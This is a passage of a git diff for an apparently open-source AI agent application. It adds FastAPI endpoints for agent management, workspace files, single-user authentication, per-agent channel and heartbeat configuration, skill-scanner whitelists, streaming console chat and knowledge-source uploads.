+    """Create a new agent with auto-generated ID."""
+    config = load_config()
+
+    # Always generate a unique short agent ID (6 characters)
+    max_attempts = 10
+    new_id = None
+    for _ in range(max_attempts):
+        candidate_id = generate_short_agent_id()
+        if candidate_id not in config.agents.profiles:
+            new_id = candidate_id
+            break
+
+    if new_id is None:
+        raise HTTPException(
+            status_code=500,
+            detail="Failed to generate unique agent ID after 10 attempts",
+        )
+
+    # Create workspace directory
+    workspace_dir = Path(
+        request.workspace_dir or f"{WORKING_DIR}/workspaces/{new_id}",
+    ).expanduser()
+    workspace_dir.mkdir(parents=True, exist_ok=True)
+
+    # Build complete 
agent config with generated ID + from ...config.config import ( + ChannelConfig, + MCPConfig, + HeartbeatConfig, + ToolsConfig, + ) + + agent_config = AgentProfileConfig( + id=new_id, + name=request.name, + description=request.description, + workspace_dir=str(workspace_dir), + language=request.language, + channels=ChannelConfig(), + mcp=MCPConfig(), + heartbeat=HeartbeatConfig(), + tools=ToolsConfig(), + ) + + # Initialize workspace with default files + _initialize_agent_workspace(workspace_dir, agent_config) + + # Save agent configuration to workspace/agent.json + agent_ref = AgentProfileRef( + id=new_id, + workspace_dir=str(workspace_dir), + ) + + # Add to root config + config.agents.profiles[new_id] = agent_ref + save_config(config) + + # Save agent config to workspace + save_agent_config(new_id, agent_config) + + logger.info(f"Created new agent: {new_id} (name={request.name})") + + return agent_ref + + +@router.put( + "/{agentId}", + response_model=AgentProfileConfig, + summary="Update agent", + description="Update agent configuration and trigger reload", +) +async def update_agent( + agentId: str = PathParam(...), + agent_config: AgentProfileConfig = Body(...), + request: Request = None, +) -> AgentProfileConfig: + """Update agent configuration.""" + config = load_config() + + if agentId not in config.agents.profiles: + raise HTTPException( + status_code=404, + detail=f"Agent '{agentId}' not found", + ) + + # Ensure ID doesn't change + agent_config.id = agentId + + # Save agent configuration + save_agent_config(agentId, agent_config) + + # Trigger hot reload if agent is running (async, non-blocking) + # IMPORTANT: Get manager before creating background task to avoid + # accessing request object after its lifecycle ends + manager = _get_multi_agent_manager(request) + + async def reload_in_background(): + try: + await manager.reload_agent(agentId) + except Exception as e: + logger.warning(f"Background reload failed for {agentId}: {e}") + + 
asyncio.create_task(reload_in_background())
+
+    return agent_config
+
+
+@router.delete(
+    "/{agentId}",
+    summary="Delete agent",
+    description="Delete agent and workspace (cannot delete default agent)",
+)
+async def delete_agent(
+    agentId: str = PathParam(...),
+    request: Request = None,
+) -> dict:
+    """Delete an agent."""
+    config = load_config()
+
+    if agentId not in config.agents.profiles:
+        raise HTTPException(
+            status_code=404,
+            detail=f"Agent '{agentId}' not found",
+        )
+
+    if agentId == "default":
+        raise HTTPException(
+            status_code=400,
+            detail="Cannot delete the default agent",
+        )
+
+    # Stop agent instance if running
+    manager = _get_multi_agent_manager(request)
+    await manager.stop_agent(agentId)
+
+    # Remove from config
+    del config.agents.profiles[agentId]
+    save_config(config)
+
+    # Note: We don't delete the workspace directory for safety
+    # Users can manually delete it if needed
+
+    return {"success": True, "agent_id": agentId}
+
+
+@router.get(
+    "/{agentId}/files",
+    response_model=list[MdFileInfo],
+    summary="List agent workspace files",
+    description="List all markdown files in agent's workspace",
+)
+async def list_agent_files(
+    agentId: str = PathParam(...),
+    request: Request = None,
+) -> list[MdFileInfo]:
+    """List agent workspace files."""
+    manager = _get_multi_agent_manager(request)
+
+    try:
+        workspace = await manager.get_agent(agentId)
+    except ValueError as e:
+        raise HTTPException(status_code=404, detail=str(e)) from e
+
+    workspace_manager = AgentMdManager(str(workspace.workspace_dir))
+
+    try:
+        files = [
+            MdFileInfo.model_validate(file)
+            for file in workspace_manager.list_working_mds()
+        ]
+        return files
+    except Exception as e:
+        raise HTTPException(status_code=500, detail=str(e)) from e
+
+
+@router.get(
+    "/{agentId}/files/{filename}",
+    response_model=MdFileContent,
+    summary="Read agent workspace file",
+    description="Read a markdown file from agent's workspace",
+)
+async def read_agent_file(
+    agentId: str = 
PathParam(...),
+    filename: str = PathParam(...),
+    request: Request = None,
+) -> MdFileContent:
+    """Read agent workspace file."""
+    manager = _get_multi_agent_manager(request)
+
+    try:
+        workspace = await manager.get_agent(agentId)
+    except ValueError as e:
+        raise HTTPException(status_code=404, detail=str(e)) from e
+
+    workspace_manager = AgentMdManager(str(workspace.workspace_dir))
+
+    try:
+        content = workspace_manager.read_working_md(filename)
+        return MdFileContent(content=content)
+    except FileNotFoundError as exc:
+        raise HTTPException(
+            status_code=404,
+            detail=f"File '{filename}' not found",
+        ) from exc
+    except Exception as e:
+        raise HTTPException(status_code=500, detail=str(e)) from e
+
+
+@router.put(
+    "/{agentId}/files/{filename}",
+    response_model=dict,
+    summary="Write agent workspace file",
+    description="Create or update a markdown file in agent's workspace",
+)
+async def write_agent_file(
+    agentId: str = PathParam(...),
+    filename: str = PathParam(...),
+    file_content: MdFileContent = Body(...),
+    request: Request = None,
+) -> dict:
+    """Write agent workspace file."""
+    manager = _get_multi_agent_manager(request)
+
+    try:
+        workspace = await manager.get_agent(agentId)
+    except ValueError as e:
+        raise HTTPException(status_code=404, detail=str(e)) from e
+
+    workspace_manager = AgentMdManager(str(workspace.workspace_dir))
+
+    try:
+        workspace_manager.write_working_md(filename, file_content.content)
+        return {"written": True, "filename": filename}
+    except Exception as e:
+        raise HTTPException(status_code=500, detail=str(e)) from e
+
+
+@router.get(
+    "/{agentId}/memory",
+    response_model=list[MdFileInfo],
+    summary="List agent memory files",
+    description="List all memory files for an agent",
+)
+async def list_agent_memory(
+    agentId: str = PathParam(...),
+    request: Request = None,
+) -> list[MdFileInfo]:
+    """List agent memory files."""
+    manager = _get_multi_agent_manager(request)
+
+    try:
+        workspace = await 
manager.get_agent(agentId) + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + + workspace_manager = AgentMdManager(str(workspace.workspace_dir)) + + try: + files = [ + MdFileInfo.model_validate(file) + for file in workspace_manager.list_memory_mds() + ] + return files + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +def _initialize_agent_workspace( # pylint: disable=too-many-branches + workspace_dir: Path, + agent_config: AgentProfileConfig, # pylint: disable=unused-argument +) -> None: + """Initialize agent workspace (similar to copaw init --defaults). + + Args: + workspace_dir: Path to agent workspace + agent_config: Agent configuration (reserved for future use) + """ + import shutil + from ...config import load_config as load_global_config + + # Create essential subdirectories + (workspace_dir / "sessions").mkdir(exist_ok=True) + (workspace_dir / "memory").mkdir(exist_ok=True) + (workspace_dir / "active_skills").mkdir(exist_ok=True) + (workspace_dir / "customized_skills").mkdir(exist_ok=True) + + # Get language from global config + config = load_global_config() + language = config.agents.language or "zh" + + # Copy MD files from agents/md_files/{language}/ to workspace + md_files_dir = ( + Path(__file__).parent.parent.parent / "agents" / "md_files" / language + ) + if md_files_dir.exists(): + for md_file in md_files_dir.glob("*.md"): + target_file = workspace_dir / md_file.name + if not target_file.exists(): + try: + shutil.copy2(md_file, target_file) + except Exception as e: + logger.warning( + f"Failed to copy {md_file.name}: {e}", + ) + + # Create HEARTBEAT.md if not exists + heartbeat_file = workspace_dir / "HEARTBEAT.md" + if not heartbeat_file.exists(): + DEFAULT_HEARTBEAT_MDS = { + "zh": """# Heartbeat checklist +- 扫描收件箱紧急邮件 +- 查看未来 2h 的日历 +- 检查待办是否卡住 +- 若安静超过 8h,轻量 check-in +""", + "en": """# Heartbeat checklist +- Scan inbox for urgent email +- Check calendar for next 2h +- 
Check tasks for blockers +- Light check-in if quiet for 8h +""", + "ru": """# Heartbeat checklist +- Проверить входящие на срочные письма +- Просмотреть календарь на ближайшие 2 часа +- Проверить задачи на наличие блокировок +- Лёгкая проверка при отсутствии активности более 8 часов +""", + } + heartbeat_content = DEFAULT_HEARTBEAT_MDS.get( + language, + DEFAULT_HEARTBEAT_MDS["en"], + ) + with open(heartbeat_file, "w", encoding="utf-8") as f: + f.write(heartbeat_content.strip()) + + # Copy builtin skills to agent's active_skills directory + builtin_skills_dir = ( + Path(__file__).parent.parent.parent / "agents" / "skills" + ) + if builtin_skills_dir.exists(): + for skill_dir in builtin_skills_dir.iterdir(): + if skill_dir.is_dir() and (skill_dir / "SKILL.md").exists(): + target_skill_dir = ( + workspace_dir / "active_skills" / skill_dir.name + ) + if not target_skill_dir.exists(): + try: + shutil.copytree(skill_dir, target_skill_dir) + except Exception as e: + logger.warning( + f"Failed to copy skill {skill_dir.name}: {e}", + ) + + # Create empty jobs.json for cron jobs + jobs_file = workspace_dir / "jobs.json" + if not jobs_file.exists(): + with open(jobs_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "jobs": []}, + f, + ensure_ascii=False, + indent=2, + ) + + # Create empty chats.json for chat history + chats_file = workspace_dir / "chats.json" + if not chats_file.exists(): + with open(chats_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "chats": []}, + f, + ensure_ascii=False, + indent=2, + ) + + # Create empty token_usage.json + token_usage_file = workspace_dir / "token_usage.json" + if not token_usage_file.exists(): + with open(token_usage_file, "w", encoding="utf-8") as f: + f.write("[]") diff --git a/src/copaw/app/routers/auth.py b/src/copaw/app/routers/auth.py new file mode 100644 index 000000000..9fc7510d4 --- /dev/null +++ b/src/copaw/app/routers/auth.py @@ -0,0 +1,113 @@ +# -*- coding: utf-8 -*- +"""Authentication API 
endpoints.""" +from __future__ import annotations + +import os + +from fastapi import APIRouter, HTTPException, Request +from pydantic import BaseModel + +from ..auth import ( + authenticate, + has_registered_users, + is_auth_enabled, + register_user, + verify_token, +) + +router = APIRouter(prefix="/auth", tags=["auth"]) + + +class LoginRequest(BaseModel): + username: str + password: str + + +class LoginResponse(BaseModel): + token: str + username: str + + +class RegisterRequest(BaseModel): + username: str + password: str + + +class AuthStatusResponse(BaseModel): + enabled: bool + has_users: bool + + +@router.post("/login") +async def login(req: LoginRequest): + """Authenticate with username and password.""" + if not is_auth_enabled(): + return LoginResponse(token="", username="") + + token = authenticate(req.username, req.password) + if token is None: + raise HTTPException(status_code=401, detail="Invalid credentials") + + return LoginResponse(token=token, username=req.username) + + +@router.post("/register") +async def register(req: RegisterRequest): + """Register the single user account (only allowed once).""" + env_flag = os.environ.get("COPAW_AUTH_ENABLED", "").strip().lower() + if env_flag not in ("true", "1", "yes"): + raise HTTPException( + status_code=403, + detail="Authentication is not enabled", + ) + + if has_registered_users(): + raise HTTPException( + status_code=403, + detail="User already registered", + ) + + if not req.username.strip() or not req.password.strip(): + raise HTTPException( + status_code=400, + detail="Username and password are required", + ) + + token = register_user(req.username.strip(), req.password) + if token is None: + raise HTTPException( + status_code=409, + detail="Registration failed", + ) + + return LoginResponse(token=token, username=req.username.strip()) + + +@router.get("/status") +async def auth_status(): + """Check if authentication is enabled and whether a user exists.""" + return AuthStatusResponse( + 
enabled=is_auth_enabled(), + has_users=has_registered_users(), + ) + + +@router.get("/verify") +async def verify(request: Request): + """Verify that the caller's Bearer token is still valid.""" + if not is_auth_enabled(): + return {"valid": True, "username": ""} + + auth_header = request.headers.get("Authorization", "") + token = auth_header[7:] if auth_header.startswith("Bearer ") else "" + if not token: + raise HTTPException(status_code=401, detail="No token provided") + + username = verify_token(token) + if username is None: + raise HTTPException( + status_code=401, + detail="Invalid or expired token", + ) + + return {"valid": True, "username": username} diff --git a/src/copaw/app/routers/config.py b/src/copaw/app/routers/config.py index 2a2ff3c07..81f49b6aa 100644 --- a/src/copaw/app/routers/config.py +++ b/src/copaw/app/routers/config.py @@ -1,13 +1,14 @@ # -*- coding: utf-8 -*- +from datetime import datetime, timezone from typing import Any, List from fastapi import APIRouter, Body, HTTPException, Path, Request +from pydantic import BaseModel from ...config import ( load_config, save_config, - get_heartbeat_config, ChannelConfig, ChannelConfigUnion, get_available_channels, @@ -27,6 +28,8 @@ MattermostConfig, MQTTConfig, QQConfig, + SkillScannerConfig, + SkillScannerWhitelistEntry, TelegramConfig, VoiceChannelConfig, ) @@ -56,15 +59,23 @@ summary="List all channels", description="Retrieve configuration for all available channels", ) -async def list_channels() -> dict: +async def list_channels(request: Request) -> dict: """List all channel configs (filtered by available channels).""" - config = load_config() + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + agent_config = agent.config available = get_available_channels() - # Get all channel configs from model_dump and __pydantic_extra__ - all_configs = config.channels.model_dump() - extra = getattr(config.channels, "__pydantic_extra__", None) or {} - 
all_configs.update(extra) + # Get channel configs from agent's config (with fallback to empty) + channels_config = agent_config.channels + if channels_config is None: + # No channels config yet, use empty defaults + all_configs = {} + else: + all_configs = channels_config.model_dump() + extra = getattr(channels_config, "__pydantic_extra__", None) or {} + all_configs.update(extra) # Return all available channels (use default config if not saved) result = {} @@ -102,15 +113,40 @@ async def list_channel_types() -> List[str]: description="Update configuration for all channels at once", ) async def put_channels( + request: Request, channels_config: ChannelConfig = Body( ..., description="Complete channel configuration", ), ) -> ChannelConfig: """Update all channel configs.""" - config = load_config() - config.channels = channels_config - save_config(config) + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + + agent = await get_agent_for_request(request) + agent.config.channels = channels_config + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return channels_config @@ -121,6 +157,7 @@ async def put_channels( description="Retrieve configuration for a specific channel by name", ) async def get_channel( + request: Request, channel_name: str = Path( ..., description="Name of the channel to retrieve", @@ -128,16 +165,26 @@ async def get_channel( ), ) -> ChannelConfigUnion: """Get a specific 
channel config by name.""" + from ..agent_context import get_agent_for_request + available = get_available_channels() if channel_name not in available: raise HTTPException( status_code=404, detail=f"Channel '{channel_name}' not found", ) - config = load_config() - single_channel_config = getattr(config.channels, channel_name, None) + + agent = await get_agent_for_request(request) + channels = agent.config.channels + if channels is None: + raise HTTPException( + status_code=404, + detail=f"Channel '{channel_name}' not configured", + ) + + single_channel_config = getattr(channels, channel_name, None) if single_channel_config is None: - extra = getattr(config.channels, "__pydantic_extra__", None) or {} + extra = getattr(channels, "__pydantic_extra__", None) or {} single_channel_config = extra.get(channel_name) if single_channel_config is None: raise HTTPException( @@ -154,6 +201,7 @@ async def get_channel( description="Update configuration for a specific channel by name", ) async def put_channel( + request: Request, channel_name: str = Path( ..., description="Name of the channel to update", @@ -165,13 +213,21 @@ async def put_channel( ), ) -> ChannelConfigUnion: """Update a specific channel config by name.""" + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + available = get_available_channels() if channel_name not in available: raise HTTPException( status_code=404, detail=f"Channel '{channel_name}' not found", ) - config = load_config() + + agent = await get_agent_for_request(request) + + # Initialize channels if not exists + if agent.config.channels is None: + agent.config.channels = ChannelConfig() config_class = _CHANNEL_CONFIG_CLASS_MAP.get(channel_name) if config_class is not None: @@ -180,9 +236,30 @@ async def put_channel( # For custom channels, just use the dict channel_config = single_channel_config - # Allow setting extra (plugin) channel config - setattr(config.channels, channel_name, channel_config) - 
save_config(config) + # Set channel config in agent's config + setattr(agent.config.channels, channel_name, channel_config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return channel_config @@ -191,9 +268,16 @@ async def put_channel( summary="Get heartbeat config", description="Return current heartbeat config (interval, target, etc.)", ) -async def get_heartbeat() -> Any: +async def get_heartbeat(request: Request) -> Any: """Return effective heartbeat config (from file or default).""" - hb = get_heartbeat_config() + from ..agent_context import get_agent_for_request + from ...config.config import HeartbeatConfig as HeartbeatConfigModel + + agent = await get_agent_for_request(request) + hb = agent.config.heartbeat + if hb is None: + # Use default if not configured + hb = HeartbeatConfigModel() return hb.model_dump(mode="json", by_alias=True) @@ -207,19 +291,34 @@ async def put_heartbeat( body: HeartbeatBody = Body(..., description="Heartbeat configuration"), ) -> Any: """Update heartbeat config and reschedule the heartbeat job.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config + + agent = await get_agent_for_request(request) hb = HeartbeatConfig( enabled=body.enabled, every=body.every, target=body.target, active_hours=body.active_hours, ) - config.agents.defaults.heartbeat = hb - save_config(config) + agent.config.heartbeat = hb + 
save_agent_config(agent.agent_id, agent.config) + + # Reschedule heartbeat (async, non-blocking) + import asyncio - cron_manager = getattr(request.app.state, "cron_manager", None) - if cron_manager is not None: - await cron_manager.reschedule_heartbeat() + async def reschedule_in_background(): + try: + if agent.cron_manager is not None: + await agent.cron_manager.reschedule_heartbeat() + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reschedule failed: {e}", + ) + + asyncio.create_task(reschedule_in_background()) return hb.model_dump(mode="json", by_alias=True) @@ -248,6 +347,36 @@ async def put_agents_llm_routing( return body +# ── User Timezone ──────────────────────────────────────────────────── + + +@router.get( + "/user-timezone", + summary="Get user timezone", + description="Return the configured user IANA timezone", +) +async def get_user_timezone() -> dict: + config = load_config() + return {"timezone": config.user_timezone} + + +@router.put( + "/user-timezone", + summary="Update user timezone", + description="Set the user IANA timezone", +) +async def put_user_timezone( + body: dict = Body(..., description="Body with 'timezone' key"), +) -> dict: + tz = body.get("timezone", "").strip() + if not tz: + raise HTTPException(status_code=400, detail="timezone is required") + config = load_config() + config.user_timezone = tz + save_config(config) + return {"timezone": tz} + + # ── Security / Tool Guard ──────────────────────────────────────────── @@ -307,3 +436,127 @@ async def get_builtin_rules() -> List[ToolGuardRuleConfig]: ) for r in rules ] + + +# ── Security / Skill Scanner ──────────────────────────────────────── + + +@router.get( + "/security/skill-scanner", + response_model=SkillScannerConfig, + summary="Get skill scanner settings", +) +async def get_skill_scanner() -> SkillScannerConfig: + config = load_config() + return config.security.skill_scanner + + +@router.put( + "/security/skill-scanner", + 
response_model=SkillScannerConfig, + summary="Update skill scanner settings", +) +async def put_skill_scanner( + body: SkillScannerConfig = Body(...), +) -> SkillScannerConfig: + config = load_config() + config.security.skill_scanner = body + save_config(config) + return body + + +@router.get( + "/security/skill-scanner/blocked-history", + summary="Get blocked skills history", +) +async def get_blocked_history() -> list: + from ...security.skill_scanner import get_blocked_history as _get_history + + records = _get_history() + return [r.to_dict() for r in records] + + +@router.delete( + "/security/skill-scanner/blocked-history", + summary="Clear all blocked skills history", +) +async def delete_blocked_history() -> dict: + from ...security.skill_scanner import clear_blocked_history + + clear_blocked_history() + return {"cleared": True} + + +@router.delete( + "/security/skill-scanner/blocked-history/{index}", + summary="Remove a single blocked history entry", +) +async def delete_blocked_entry( + index: int = Path(..., ge=0), +) -> dict: + from ...security.skill_scanner import remove_blocked_entry + + ok = remove_blocked_entry(index) + if not ok: + raise HTTPException(status_code=404, detail="Entry not found") + return {"removed": True} + + +class WhitelistAddRequest(BaseModel): + skill_name: str + content_hash: str = "" + + +@router.post( + "/security/skill-scanner/whitelist", + summary="Add a skill to the whitelist", +) +async def add_to_whitelist( + body: WhitelistAddRequest = Body(...), +) -> dict: + skill_name = body.skill_name.strip() + content_hash = body.content_hash + if not skill_name: + raise HTTPException(status_code=400, detail="skill_name is required") + + config = load_config() + scanner_cfg = config.security.skill_scanner + + for entry in scanner_cfg.whitelist: + if entry.skill_name == skill_name: + raise HTTPException( + status_code=409, + detail=f"Skill '{skill_name}' is already whitelisted", + ) + + scanner_cfg.whitelist.append( + 
SkillScannerWhitelistEntry( + skill_name=skill_name, + content_hash=content_hash, + added_at=datetime.now(timezone.utc).isoformat(), + ), + ) + save_config(config) + return {"whitelisted": True, "skill_name": skill_name} + + +@router.delete( + "/security/skill-scanner/whitelist/{skill_name}", + summary="Remove a skill from the whitelist", +) +async def remove_from_whitelist( + skill_name: str = Path(..., min_length=1), +) -> dict: + config = load_config() + scanner_cfg = config.security.skill_scanner + original_len = len(scanner_cfg.whitelist) + scanner_cfg.whitelist = [ + e for e in scanner_cfg.whitelist if e.skill_name != skill_name + ] + if len(scanner_cfg.whitelist) == original_len: + raise HTTPException( + status_code=404, + detail=f"Skill '{skill_name}' not found in whitelist", + ) + save_config(config) + return {"removed": True, "skill_name": skill_name} diff --git a/src/copaw/app/routers/console.py b/src/copaw/app/routers/console.py index c44883f97..fc3c02748 100644 --- a/src/copaw/app/routers/console.py +++ b/src/copaw/app/routers/console.py @@ -1,12 +1,153 @@ # -*- coding: utf-8 -*- -"""Console APIs for push messages.""" +"""Console APIs: push messages and chat.""" +from __future__ import annotations -from fastapi import APIRouter, Query +import json +import logging +from typing import AsyncGenerator, Union +from fastapi import APIRouter, HTTPException, Query, Request +from starlette.responses import StreamingResponse + +from agentscope_runtime.engine.schemas.agent_schemas import AgentRequest +from ..agent_context import get_agent_for_request + +logger = logging.getLogger(__name__) router = APIRouter(prefix="/console", tags=["console"]) +def _extract_session_and_payload(request_data: Union[AgentRequest, dict]): + """Extract run_key (ChatSpec.id), session_id, and native payload. + + run_key must be ChatSpec.id (chat_id) so it matches list_chats/get_chat. 
+ """ + if isinstance(request_data, AgentRequest): + channel_id = request_data.channel or "console" + sender_id = request_data.user_id or "default" + session_id = request_data.session_id or "default" + content_parts = ( + list(request_data.input[0].content) if request_data.input else [] + ) + else: + channel_id = request_data.get("channel", "console") + sender_id = request_data.get("user_id", "default") + session_id = request_data.get("session_id", "default") + input_data = request_data.get("input", []) + content_parts = [] + for content_part in input_data: + if hasattr(content_part, "content"): + content_parts.extend(list(content_part.content or [])) + elif isinstance(content_part, dict) and "content" in content_part: + content_parts.extend(content_part["content"] or []) + + native_payload = { + "channel_id": channel_id, + "sender_id": sender_id, + "content_parts": content_parts, + "meta": { + "session_id": session_id, + "user_id": sender_id, + }, + } + return native_payload + + +@router.post( + "/chat", + status_code=200, + summary="Chat with console (streaming response)", + description="Agent API Request Format. See runtime.agentscope.io. " + "Use body.reconnect=true to attach to a running stream.", +) +async def post_console_chat( + request_data: Union[AgentRequest, dict], + request: Request, +) -> StreamingResponse: + """Stream agent response. Run continues in background after disconnect. + Stop via POST /console/chat/stop. Reconnect with body.reconnect=true. 
+ """ + workspace = await get_agent_for_request(request) + console_channel = await workspace.channel_manager.get_channel("console") + if console_channel is None: + raise HTTPException( + status_code=503, + detail="Channel Console not found", + ) + try: + native_payload = _extract_session_and_payload(request_data) + except ValueError as e: + raise HTTPException(status_code=400, detail=str(e)) from e + session_id = console_channel.resolve_session_id( + sender_id=native_payload["sender_id"], + channel_meta=native_payload["meta"], + ) + name = "New Chat" + if len(native_payload["content_parts"]) > 0: + content = native_payload["content_parts"][0] + if content: + name = content.text[:10] + else: + name = "Media Message" + chat = await workspace.chat_manager.get_or_create_chat( + session_id, + native_payload["sender_id"], + native_payload["channel_id"], + name=name, + ) + tracker = workspace.task_tracker + + is_reconnect = False + if isinstance(request_data, dict): + is_reconnect = request_data.get("reconnect") is True + + if is_reconnect: + queue = await tracker.attach(chat.id) + if queue is None: + raise HTTPException( + status_code=404, + detail="No running chat for this session", + ) + else: + queue, _ = await tracker.attach_or_start( + chat.id, + native_payload, + console_channel.stream_one, + ) + + async def event_generator() -> AsyncGenerator[str, None]: + try: + async for event_data in tracker.stream_from_queue(queue): + yield event_data + except Exception as e: + logger.exception("Console chat stream error") + yield f"data: {json.dumps({'error': str(e)})}\n\n" + + return StreamingResponse( + event_generator(), + media_type="text/event-stream", + headers={ + "Cache-Control": "no-cache", + "Connection": "keep-alive", + }, + ) + + +@router.post( + "/chat/stop", + status_code=200, + summary="Stop running console chat", +) +async def post_console_chat_stop( + request: Request, + chat_id: str = Query(..., description="Chat id (ChatSpec.id) to stop"), +) -> dict: + 
"""Stop the running chat. Only stops when called.""" + workspace = await get_agent_for_request(request) + stopped = await workspace.task_tracker.request_stop(chat_id) + return {"stopped": stopped} + + @router.get("/push-messages") async def get_push_messages( session_id: str | None = Query(None, description="Optional session id"), diff --git a/src/copaw/app/routers/knowledge.py b/src/copaw/app/routers/knowledge.py new file mode 100644 index 000000000..0fdb7f728 --- /dev/null +++ b/src/copaw/app/routers/knowledge.py @@ -0,0 +1,471 @@ +# -*- coding: utf-8 -*- + +from __future__ import annotations + +import asyncio +import io +import json +import shutil +import tempfile +import zipfile +from datetime import datetime, timezone +from pathlib import Path +from typing import Optional +from types import SimpleNamespace + +from fastapi import APIRouter, Body, File, Form, HTTPException, Query, UploadFile, WebSocket, WebSocketDisconnect +from fastapi.responses import StreamingResponse + +from ...config import load_config, save_config +from ...config.config import KnowledgeConfig, KnowledgeSourceSpec +from ...constant import WORKING_DIR +from ...knowledge import GraphOpsManager, KnowledgeManager +from ...knowledge.module_skills import sync_knowledge_module_skills + +router = APIRouter(prefix="/knowledge", tags=["knowledge"]) + + +def _knowledge_runtime_enabled(config) -> bool: + running = getattr(getattr(config, "agents", None), "running", None) + return bool(getattr(running, "knowledge_enabled", True)) + + +def _knowledge_effective_enabled(config) -> bool: + return _knowledge_runtime_enabled(config) and bool( + getattr(getattr(config, "knowledge", None), "enabled", False) + ) + + +def _ensure_knowledge_enabled(config) -> None: + if not _knowledge_effective_enabled(config): + raise HTTPException(status_code=400, detail="KNOWLEDGE_DISABLED") + + +def _zip_path(path) -> io.BytesIO: + buf = io.BytesIO() + with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf: + for entry in 
sorted(path.rglob("*")): + arcname = entry.relative_to(path).as_posix() + if entry.is_file(): + zf.write(entry, arcname) + elif entry.is_dir(): + zf.write(entry, arcname + "/") + buf.seek(0) + return buf + + +def _validate_zip_data(data: bytes) -> None: + if not zipfile.is_zipfile(io.BytesIO(data)): + raise HTTPException( + status_code=400, + detail="Uploaded file is not a valid zip archive", + ) + with zipfile.ZipFile(io.BytesIO(data)) as zf: + for name in zf.namelist(): + p = Path(name) + if p.is_absolute() or ".." in p.parts: + raise HTTPException( + status_code=400, + detail=f"Zip contains unsafe path: {name}", + ) + + +def _extract_zip_to_temp(data: bytes) -> Path: + tmp_dir = Path(tempfile.mkdtemp(prefix="copaw_knowledge_import_")) + with zipfile.ZipFile(io.BytesIO(data)) as zf: + zf.extractall(tmp_dir) + return tmp_dir + + +def _detect_extract_root(tmp_dir: Path) -> Path: + entries = [entry for entry in tmp_dir.iterdir() if not entry.name.startswith(".__")] + if len(entries) == 1 and entries[0].is_dir() and (entries[0] / "sources").exists(): + return entries[0] + return tmp_dir + + +def _clamp_int(value: str | None, default: int, minimum: int, maximum: int) -> int: + try: + parsed = int((value or "").strip()) + except (TypeError, ValueError): + parsed = default + return max(minimum, min(maximum, parsed)) + + +def _manager() -> KnowledgeManager: + return KnowledgeManager(WORKING_DIR) + + +def _find_source(config: KnowledgeConfig, source_id: str) -> Optional[KnowledgeSourceSpec]: + for source in config.sources: + if source.id == source_id: + return source + return None + + +@router.get("/config", response_model=KnowledgeConfig) +async def get_knowledge_config() -> KnowledgeConfig: + return load_config().knowledge + + +@router.put("/config", response_model=KnowledgeConfig) +async def put_knowledge_config( + knowledge_config: KnowledgeConfig = Body(...), +) -> KnowledgeConfig: + config = load_config() + previous_enabled = bool(getattr(config.agents.running, 
"knowledge_enabled", True)) + config.knowledge = knowledge_config + config.agents.running.knowledge_enabled = knowledge_config.enabled + if previous_enabled != knowledge_config.enabled: + sync_knowledge_module_skills(knowledge_config.enabled) + save_config(config) + return config.knowledge + + +@router.get("/sources") +async def list_sources(): + config = load_config() + return { + "enabled": _knowledge_effective_enabled(config), + "sources": _manager().list_sources(config.knowledge), + } + + +@router.put("/sources", response_model=KnowledgeSourceSpec) +async def upsert_source( + source: KnowledgeSourceSpec = Body(...), +) -> KnowledgeSourceSpec: + config = load_config() + _ensure_knowledge_enabled(config) + manager = _manager() + source = manager.normalize_source_name(source, config.knowledge) + existing = _find_source(config.knowledge, source.id) + if existing is None: + config.knowledge.sources.append(source) + else: + index = config.knowledge.sources.index(existing) + config.knowledge.sources[index] = source + save_config(config) + return source + + +@router.post("/upload/file") +async def upload_knowledge_file( + source_id: str = Form(...), + file: UploadFile = File(...), +): + data = await file.read() + if not data: + raise HTTPException(status_code=400, detail="Uploaded file is empty") + saved_path = _manager().save_uploaded_file( + source_id=source_id, + filename=file.filename or "knowledge-upload", + data=data, + ) + return { + "location": str(saved_path), + "filename": saved_path.name, + } + + +@router.post("/upload/directory") +async def upload_knowledge_directory( + source_id: str = Form(...), + relative_paths: list[str] = Form(...), + files: list[UploadFile] = File(...), +): + if len(files) != len(relative_paths): + raise HTTPException( + status_code=400, + detail="files and relative_paths length mismatch", + ) + saved_pairs = [] + for relative_path, upload in zip(relative_paths, files): + saved_pairs.append((relative_path, await upload.read())) + 
